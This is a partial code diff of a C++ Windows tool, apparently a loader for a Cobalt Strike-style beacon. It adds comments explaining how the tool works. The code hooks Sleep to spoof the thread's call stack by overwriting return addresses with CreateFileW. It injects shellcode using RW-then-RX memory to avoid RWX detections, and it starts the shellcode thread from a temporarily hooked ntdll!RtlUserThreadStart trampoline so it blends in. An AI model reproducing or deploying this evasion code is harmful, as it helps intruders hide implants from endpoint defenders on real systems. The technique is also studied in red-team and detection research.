| skipped 7 lines |
8 | 8 | | void WINAPI MySleep(DWORD _dwMilliseconds) |
9 | 9 | | { |
10 | 10 | | const volatile DWORD dwMilliseconds = _dwMilliseconds; |
| 11 | + | |
| 12 | + | // Spoof this (current) thread's call stack for the duration of the sleep. |
11 | 13 | | spoofCallStack(true); |
12 | 14 | | |
13 | | - | log("MySleep(", std::dec, dwMilliseconds, ")"); |
| 15 | + | log("\n===> MySleep(", std::dec, dwMilliseconds, ")\n"); |
| 16 | + | |
| 17 | + | // Perform the actual (non-alertable) sleep, emulating the originally hooked functionality. |
14 | 18 | | ::SleepEx(dwMilliseconds, false); |
15 | 19 | | |
| 20 | + | // Restore the thread's original call stack once the sleep has returned. |
16 | 21 | | spoofCallStack(false); |
17 | 22 | | } |
18 | 23 | | |
| skipped 97 lines |
116 | 121 | | |
117 | 122 | | c.ContextFlags = CONTEXT_ALL; |
118 | 123 | | |
| 124 | + | // |
| 125 | + | // It looks like RtlCaptureContext was able to capture the running (current) thread's context, |
| 126 | + | // whereas GetThreadContext failed to do so. |
| 127 | + | // |
119 | 128 | | if (hThread == GetCurrentThread() || hThread == 0) |
120 | 129 | | RtlCaptureContext(&c); |
121 | 130 | | else |
| skipped 33 lines |
155 | 164 | | #error "Platform not supported!" |
156 | 165 | | #endif |
157 | 166 | | |
158 | | - | log("WalkCallStack: Stack Trace: "); |
| 167 | + | log("\nWalkCallStack: Stack Trace: "); |
159 | 168 | | |
160 | 169 | | *numOfFrames = 0; |
161 | 170 | | ULONG Frame = 0; |
162 | 171 | | |
163 | 172 | | for (Frame = 0; ; Frame++) |
164 | 173 | | { |
| 174 | + | // |
| 175 | + | // A call to dbghelp!StackWalk64 that will let us iterate over thread's call stack. |
| 176 | + | // |
165 | 177 | | BOOL result = g_stackTraceSpoofing.pStackWalk64( |
166 | 178 | | imageType, |
167 | 179 | | GetCurrentProcess(), |
| skipped 13 lines |
181 | 193 | | { |
182 | 194 | | if (curRecursionCount > 1000) |
183 | 195 | | { |
| 196 | + | // Overly deep recursion spotted, bailing out. |
184 | 197 | | break; |
185 | 198 | | } |
186 | 199 | | curRecursionCount++; |
| skipped 13 lines |
200 | 213 | | if (Frame > maxFrames) |
201 | 214 | | break; |
202 | 215 | | |
203 | | - | if (Frame < Frames_To_Preserve) continue; |
| 216 | + | // |
| 217 | + | // Skip the first two frames, as they most likely link back to our callers and thus we can't spoof them: |
| 218 | + | // MySleep(...) -> spoofCallStack(...) -> ... |
| 219 | + | // |
| 220 | + | if (Frame < Frames_To_Preserve) |
| 221 | + | continue; |
204 | 222 | | |
205 | 223 | | bool skipFrame = false; |
206 | 224 | | |
| skipped 3 lines |
210 | 228 | | |
211 | 229 | | if (VirtualQuery((LPVOID)frame.retAddr, &mbi, sizeof(mbi))) |
212 | 230 | | { |
| 231 | + | // |
| 232 | + | // If a frame points back to a memory page that is not MEM_PRIVATE (i.e. not originating from VirtualAlloc) |
| 233 | + | // we can skip it, as it shouldn't point back to our beacon's memory pages. |
| 234 | + | // Also, I've noticed that for some reason the parameter for kernel32!Sleep clobbers the stack, making it look like |
| 235 | + | // it's a frame of its own. That address (5 seconds = 5000ms = 0x1388), when queried with VirtualQuery, seems to return |
| 236 | + | // mbi.Type == 0. We're using this observation to include such frame in spoofing. |
| 237 | + | // |
213 | 238 | | if (mbi.Type != MEM_PRIVATE && mbi.Type != 0) skipFrame = true; |
214 | 239 | | |
215 | | - | if ((mbi.Protect & PAGE_EXECUTE) != 0 || (mbi.Protect & PAGE_EXECUTE_READ) != 0 || !(mbi.Protect & PAGE_EXECUTE_READWRITE) != 0) { |
216 | | - | } |
217 | | - | else { |
218 | | - | skipFrame = true; |
219 | | - | } |
220 | 240 | | } |
221 | 241 | | |
222 | 242 | | if (frame.retAddr == invalidAddr) skipFrame = true; |
| skipped 7 lines |
230 | 250 | | log("\t", std::dec, Frame, ".\tcalledFrom: 0x", std::setw(8), std::hex, frame.calledFrom, " - stack: 0x", frame.stackAddr, |
231 | 251 | | " - frame: 0x", frame.frameAddr, " - ret: 0x", frame.retAddr, " - skip? ", skipFrame); |
232 | 252 | | } |
233 | | - | |
234 | | - | log("WalkCallStack: Stack Trace finished."); |
235 | 253 | | } |
236 | 254 | | |
237 | 255 | | void spoofCallStack(bool overwriteOrRestore) |
| skipped 1 lines |
239 | 257 | | CallStackFrame frames[MaxStackFramesToSpoof] = { 0 }; |
240 | 258 | | size_t numOfFrames = 0; |
241 | 259 | | |
| 260 | + | // |
| 261 | + | // Firstly we walk through the current thread's call stack collecting all frames |
| 262 | + | // that resemble references to Beacon's allocation pages (or that otherwise look anomalous). |
| 263 | + | // |
242 | 264 | | walkCallStack(GetCurrentThread(), frames, _countof(frames), &numOfFrames, true); |
243 | 265 | | |
244 | 266 | | if (overwriteOrRestore) |
| skipped 4 lines |
249 | 271 | | |
250 | 272 | | if (g_stackTraceSpoofing.spoofedFrames < MaxStackFramesToSpoof) |
251 | 273 | | { |
| 274 | + | // |
| 275 | + | // We will use CreateFileW as a fake return address to place onto the thread's frame on stack. |
| 276 | + | // |
252 | 277 | | frame.overwriteWhat = (ULONG_PTR)::CreateFileW; |
| 278 | + | |
| 279 | + | // |
| 280 | + | // We're saving original frame to later use it for call stack restoration. |
| 281 | + | // |
253 | 282 | | g_stackTraceSpoofing.spoofedFrame[g_stackTraceSpoofing.spoofedFrames++] = frame; |
254 | 283 | | } |
255 | 284 | | } |
| skipped 1 lines |
257 | 286 | | for (size_t i = 0; i < g_stackTraceSpoofing.spoofedFrames; i++) |
258 | 287 | | { |
259 | 288 | | auto frame = g_stackTraceSpoofing.spoofedFrame[i]; |
| 289 | + | |
| 290 | + | // |
| 291 | + | // We overwrite thread's frame by writing a function pointer onto the thread's stack precisely where |
| 292 | + | // the function's return address is stored. |
| 293 | + | // |
260 | 294 | | *(PULONG_PTR)(frame.frameAddr + sizeof(ULONG_PTR)) = frame.overwriteWhat; |
261 | 295 | | |
262 | 296 | | log("\t\t\tSpoofed: 0x", |
| skipped 6 lines |
269 | 303 | | { |
270 | 304 | | auto frame = g_stackTraceSpoofing.spoofedFrame[i]; |
271 | 305 | | |
| 306 | + | // |
| 307 | + | // Here we restore original return addresses so that our shellcode can continue its execution. |
| 308 | + | // |
272 | 309 | | *(PULONG_PTR)(frame.frameAddr + sizeof(ULONG_PTR)) = frame.retAddr; |
273 | 310 | | |
274 | 311 | | log("\t\t\tRestored: 0x", std::setw(8), std::setfill('0'), std::hex, frame.overwriteWhat, " -> 0x", frame.retAddr); |
| skipped 10 lines |
285 | 322 | | { |
286 | 323 | | memset(&g_stackTraceSpoofing, 0, sizeof(g_stackTraceSpoofing)); |
287 | 324 | | |
| 325 | + | // |
| 326 | + | // Firstly we need to load dbghelp.dll to resolve necessary functions' pointers. |
| 327 | + | // |
288 | 328 | | g_stackTraceSpoofing.hDbghelp = LoadLibraryA("dbghelp.dll"); |
289 | 329 | | if (!g_stackTraceSpoofing.hDbghelp) |
290 | 330 | | return false; |
291 | 331 | | |
| 332 | + | // |
| 333 | + | // Now we resolve addresses of a few required functions. |
| 334 | + | // |
292 | 335 | | g_stackTraceSpoofing.pSymFunctionTableAccess64 = |
293 | 336 | | GetProcAddress(g_stackTraceSpoofing.hDbghelp, "SymFunctionTableAccess64"); |
294 | 337 | | g_stackTraceSpoofing.pSymGetModuleBase64 = |
| skipped 10 lines |
305 | 348 | | ) |
306 | 349 | | return false; |
307 | 350 | | |
| 351 | + | // |
| 352 | + | // Now in order to get StackWalk64 working correctly, we need to call SymInitialize. |
| 353 | + | // |
308 | 354 | | pSymInitialize(GetCurrentProcess(), nullptr, TRUE); |
309 | 355 | | |
310 | 356 | | log("[+] Stack spoofing initialized."); |
| skipped 27 lines |
338 | 384 | | |
339 | 385 | | bool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr &thread) |
340 | 386 | | { |
| 387 | + | // |
| 388 | + | // Firstly we allocate RW page to avoid RWX-based IOC detections |
| 389 | + | // |
341 | 390 | | auto alloc = ::VirtualAlloc( |
342 | 391 | | NULL, |
343 | 392 | | shellcode.size() + 1, |
| skipped 8 lines |
352 | 401 | | |
353 | 402 | | DWORD old; |
354 | 403 | | |
| 404 | + | // |
| 405 | + | // Then we change that protection to RX |
| 406 | + | // |
355 | 407 | | if (!VirtualProtect(alloc, shellcode.size() + 1, Shellcode_Memory_Protection, &old)) |
356 | 408 | | return false; |
357 | 409 | | |
| 410 | + | |
| 411 | + | // |
| 412 | + | // In order for our thread to blend in more effectively, we start it from the ntdll!RtlUserThreadStart+0x21 |
| 413 | + | // function that is hooked by placing a trampoline call into our shellcode. After a second, the function will be |
| 414 | + | // unhooked to remove easy leftovers (IOCs) and maintain process' stability. |
| 415 | + | // |
358 | 416 | | LPVOID fakeAddr = (LPVOID)(((ULONG_PTR)GetProcAddress(GetModuleHandleA("ntdll"), "RtlUserThreadStart")) + 0x21); |
359 | 417 | | |
360 | 418 | | BYTE origRtlUserThreadStartBytes[16]; |
| skipped 4 lines |
365 | 423 | | return false; |
366 | 424 | | |
367 | 425 | | shellcode.clear(); |
| 426 | + | |
| 427 | + | // |
| 428 | + | // The shellcode starts from the hooked ntdll!RtlUserThreadStart+0x21 |
| 429 | + | // |
368 | 430 | | thread.reset(::CreateThread( |
369 | 431 | | NULL, |
370 | 432 | | 0, |
| skipped 5 lines |
376 | 438 | | |
377 | 439 | | ::SleepEx(1000, false); |
378 | 440 | | |
| 441 | + | // Here we restore original stub bytes of that API. |
379 | 442 | | if (!fastTrampoline(false, (BYTE*)fakeAddr, alloc, &buffers)) |
380 | 443 | | return false; |
381 | 444 | | |
| skipped 55 lines |